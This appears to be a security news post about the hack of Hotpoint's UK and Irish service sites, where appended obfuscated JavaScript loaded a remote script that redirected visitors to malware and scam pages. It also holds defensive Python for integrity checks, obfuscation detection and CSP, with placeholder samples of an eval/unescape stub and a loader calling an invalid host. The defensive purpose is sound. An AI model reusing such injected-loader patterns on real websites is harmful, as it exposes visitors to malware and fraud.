Hotpoint service sites hacked

Hotpoint's UK service website has been hacked. Instead of allowing customers to activate warranties, book services or find an engineer, the site is currently putting its customers at risk by redirecting them to a variety of dubious websites.

Some visitors were presented with a fake Java update page, which downloaded malware.


The hacker has accomplished this feat by appending malicious JavaScript code to several of the scripts hosted on the Hotpoint service site. It was not readily apparent how the hacker gained write access to these files, but the WordPress content management system that the site runs on is notorious for being compromised if both it and its plugins are not kept up to date.
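The attack pattern described here, legitimate first-party scripts with a foreign tail appended, is exactly what a file-integrity check over served assets catches. The following Python is an added example written for this post, not code from Hotpoint, Netcraft or WordPress; the two script dictionaries are constructed sample data, and the appended `eval(unescape(...))` line is a harmless placeholder standing in for the real loader. The check distinguishes an untouched file, a file that has only had content appended (baseline is an exact prefix, so the tail can be handed to triage), and a file altered elsewhere.

```python
import hashlib

# Constructed sample data (not Hotpoint's real files): a known-good copy of the
# cookie-consent script, and the copy actually served, which has a placeholder
# obfuscated tail appended after the legitimate code.
BASELINE_SCRIPTS = {
    "cookie-consent.js": "function askCookies() {\n  return confirm('Accept cookies?');\n}\n",
}
SERVED_SCRIPTS = {
    "cookie-consent.js": (
        "function askCookies() {\n  return confirm('Accept cookies?');\n}\n"
        "eval(unescape('%61%6C%65%72%74'));  // placeholder for the appended loader\n"
    ),
}


def sha256(text):
    """Hex SHA-256 of a script body, recorded so the finding names what was served."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def check_script(name, baseline, served):
    """Classify one served script against its baseline copy.

    'ok'       : byte-for-byte identical
    'appended' : baseline is an exact prefix, so only a tail was added (the
                 pattern described in the post); the tail is returned for triage
    'modified' : changed somewhere else (edited in place or replaced)
    """
    finding = {"name": name, "served_sha256": sha256(served), "tail": ""}
    if served == baseline:
        finding["status"] = "ok"
    elif served.startswith(baseline):
        finding["status"] = "appended"
        finding["tail"] = served[len(baseline):]
    else:
        finding["status"] = "modified"
    return finding


def audit(baseline_scripts, served_scripts):
    """Run check_script over every baseline file, and also flag served files the
    baseline does not know about, since an extra file the deployment never
    shipped is itself a finding on a CMS install."""
    findings = []
    for name, baseline in baseline_scripts.items():
        if name not in served_scripts:
            findings.append({"name": name, "status": "missing",
                             "served_sha256": "", "tail": ""})
        else:
            findings.append(check_script(name, baseline, served_scripts[name]))
    for name in served_scripts:
        if name not in baseline_scripts:
            findings.append({"name": name, "status": "unexpected",
                             "served_sha256": sha256(served_scripts[name]), "tail": ""})
    return findings


if __name__ == "__main__":
    for f in audit(BASELINE_SCRIPTS, SERVED_SCRIPTS):
        print(f["name"], f["status"], repr(f["tail"][:60]))
```

In practice the baseline comes from the release that was deployed (a git tag or a build artefact), the served copies are fetched over HTTP the way a visitor would get them, and the audit runs on a schedule; an "appended" or "unexpected" result over a bank holiday weekend is the alert nobody was going to raise by eye.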

The hack has also affected Hotpoint's Irish service website, which is hosted on the same IP address as the UK one.

The malicious code appended by the attacker. This appears at the end of an otherwise-legitimate script which asks the customer whether they want to accept cookies from the site.


The appended code is obfuscated to make its purpose less apparent, perhaps in the hope that nobody would dare to delete it. De-obfuscating the code reveals that it is responsible for loading a larger obfuscated script from an external site.

The externally hosted malicious script pretends to be an innocuous jQuery file; but scrolling down reveals its true content, which is obfuscated.


Presumably, this external site is operated by the hacker, in which case he has the opportunity to change the content of his malicious payload at will. Any visitor to the Hotpoint service site could consequently be at risk of much more serious attacks, such as drive-by malware or phishing.
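Two defensive points follow from the last few paragraphs: the appended tail carries recognisable obfuscation markers, and its real job is to pull a payload from a host the site does not control. The Python below is an added example for this post, not code from the page or from Hotpoint; `SAMPLE_PACKED` and `SAMPLE_LOADER` are constructed stand-ins for the packed tail and its de-obfuscated form (the domain `cdn.example.invalid` is a placeholder, not the attacker's real host), and the allow-list host is likewise made up. It scores a script for common obfuscation indicators, lists any script hosts outside the site's own and allow-listed domains, and builds the `Content-Security-Policy` `script-src` directive that would make the browser refuse such a loader.

```python
import re
from urllib.parse import urlparse

# Constructed samples (placeholders, not the real Hotpoint payload):
# the packed form of an appended tail, and what it unpacks to.
SAMPLE_PACKED = "eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65'));"
SAMPLE_LOADER = (
    "var s=document.createElement('script');"
    "s.src='http://cdn.example.invalid/jquery.min.js';"
    "document.getElementsByTagName('head')[0].appendChild(s);"
)

# Markers that legitimate hand-written site scripts rarely need but packed
# loaders lean on: runtime evaluation, escape decoding, and long escape runs.
OBFUSCATION_INDICATORS = {
    "eval": re.compile(r"\beval\s*\("),
    "unescape": re.compile(r"\bunescape\s*\("),
    "fromCharCode": re.compile(r"String\.fromCharCode\s*\("),
    "document.write": re.compile(r"document\.write\s*\("),
    "hex_escape_run": re.compile(r"(?:\\x[0-9A-Fa-f]{2}|%[0-9A-Fa-f]{2}){8,}"),
}

URL_RE = re.compile(r"""https?://[^\s'"<>]+""")


def indicator_hits(js):
    """Names of the obfuscation indicators present in the script text."""
    return sorted(name for name, rx in OBFUSCATION_INDICATORS.items() if rx.search(js))


def external_hosts(js, own_hosts):
    """Hostnames referenced by absolute URLs in the script, minus the site's own."""
    hosts = set()
    for url in URL_RE.findall(js):
        host = urlparse(url).hostname
        if host and host not in own_hosts:
            hosts.add(host)
    return sorted(hosts)


def triage(js, own_hosts, allowed_hosts):
    """Combine both signals into one verdict for a script body or appended tail."""
    hits = indicator_hits(js)
    ext = external_hosts(js, own_hosts)
    unexpected = [h for h in ext if h not in allowed_hosts]
    return {
        "indicators": hits,
        "external_hosts": ext,
        "unexpected_hosts": unexpected,
        "suspicious": bool(hits) or bool(unexpected),
    }


def csp_script_src(allowed_hosts):
    """script-src directive permitting only the site's origin and the listed
    third-party hosts; a loader pointing anywhere else is blocked by the browser
    and reported if a report-uri/report-to is configured."""
    sources = ["'self'"] + ["https://" + h for h in sorted(allowed_hosts)]
    return "script-src " + " ".join(sources)


if __name__ == "__main__":
    own = {"service.example"}                 # constructed: the site's own host
    allowed = {"cdn.allowed.example"}         # constructed: legitimate CDN
    print(triage(SAMPLE_PACKED, own, allowed))
    print(triage(SAMPLE_LOADER, own, allowed))
    print(csp_script_src(allowed))
```

The caveat a practitioner should keep in mind: the CSP stops the externally hosted stage, which is the part the attacker can change at will, but it does not stop code that already sits inside a first-party file, so it complements rather than replaces keeping WordPress and its plugins patched and watching the served scripts for changes.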

Hotpoint service customers are also being redirected to scam survey sites like this one.

Many bank holiday shoppers who buy Hotpoint white goods are likely to fall victim to this attack, as the paperwork included with new appliances directs new customers to the site to activate their 10-year parts guarantee.

Thanks Tim

New customers are directed to the hacked site.

Existing customers desperate to find out about certain models of dangerous tumble dryers are also likely to be snared by the JavaScript attack.

Generally, the Easter bank holiday weekend is a good time for hackers to strike UK websites, as many people will be on holiday on both Good Friday and the following Monday. The longer the attacker can keep his redirection code in place, the more revenue he can reap.

Of course, there could be wider-reaching repercussions to this attack – if an attacker has been able to modify scripts on Hotpoint's website, then he could also have been in a position to view any data stored or transmitted by the site.